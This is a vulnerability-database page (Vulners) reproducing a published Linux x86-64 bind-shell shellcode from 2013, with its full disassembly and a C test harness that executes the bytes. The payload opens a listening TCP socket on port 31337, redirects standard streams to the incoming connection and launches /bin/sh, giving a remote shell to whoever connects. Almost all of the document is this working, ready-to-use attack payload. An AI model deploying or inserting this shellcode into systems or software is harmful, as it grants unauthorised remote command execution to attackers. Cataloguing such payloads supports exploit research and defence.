Vulners
Lucene search
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
/*
Title : tcpbindshell (150 bytes)
Date : 04 October 2013
Author : Russell Willis <[email protected]>
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
$ objdump -D tcpbindshell -M intel
tcpbindshell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 48 31 c0 xor rax,rax
400083: 48 31 ff xor rdi,rdi
400086: 48 31 f6 xor rsi,rsi
400089: 48 31 d2 xor rdx,rdx
40008c: 4d 31 c0 xor r8,r8
40008f: 6a 02 push 0x2
400091: 5f pop rdi
400092: 6a 01 push 0x1
400094: 5e pop rsi
400095: 6a 06 push 0x6
400097: 5a pop rdx
400098: 6a 29 push 0x29
40009a: 58 pop rax
40009b: 0f 05 syscall
40009d: 49 89 c0 mov r8,rax
4000a0: 4d 31 d2 xor r10,r10
4000a3: 41 52 push r10
4000a5: 41 52 push r10
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
4000b2: 48 89 e6 mov rsi,rsp
4000b5: 41 50 push r8
4000b7: 5f pop rdi
4000b8: 6a 10 push 0x10
4000ba: 5a pop rdx
4000bb: 6a 31 push 0x31
4000bd: 58 pop rax
4000be: 0f 05 syscall
4000c0: 41 50 push r8
4000c2: 5f pop rdi
4000c3: 6a 01 push 0x1
4000c5: 5e pop rsi
4000c6: 6a 32 push 0x32
4000c8: 58 pop rax
4000c9: 0f 05 syscall
4000cb: 48 89 e6 mov rsi,rsp
4000ce: 48 31 c9 xor rcx,rcx
4000d1: b1 10 mov cl,0x10
4000d3: 51 push rcx
4000d4: 48 89 e2 mov rdx,rsp
4000d7: 41 50 push r8
4000d9: 5f pop rdi
4000da: 6a 2b push 0x2b
4000dc: 58 pop rax
4000dd: 0f 05 syscall
4000df: 59 pop rcx
4000e0: 4d 31 c9 xor r9,r9
4000e3: 49 89 c1 mov r9,rax
4000e6: 4c 89 cf mov rdi,r9
4000e9: 48 31 f6 xor rsi,rsi
4000ec: 6a 03 push 0x3
4000ee: 5e pop rsi
00000000004000ef <doop>:
4000ef: 48 ff ce dec rsi
4000f2: 6a 21 push 0x21
4000f4: 58 pop rax
4000f5: 0f 05 syscall
4000f7: 75 f6 jne 4000ef <doop>
4000f9: 48 31 ff xor rdi,rdi
4000fc: 57 push rdi
4000fd: 57 push rdi
4000fe: 5e pop rsi
4000ff: 5a pop rdx
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
400107: 2f 73 68
40010a: 48 c1 ef 08 shr rdi,0x8
40010e: 57 push rdi
40010f: 54 push rsp
400110: 5f pop rdi
400111: 6a 3b push 0x3b
400113: 58 pop rax
400114: 0f 05 syscall
Code not is not optimal, this is left as an exercise to the reader ;^)
*/
#include <stdio.h>
#define PORT "\x7a\x69" /* 31337 */
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
int
main(void)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;
ret();
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Oct 2012 00:00Current
7.1High risk
Vulners AI Score7.1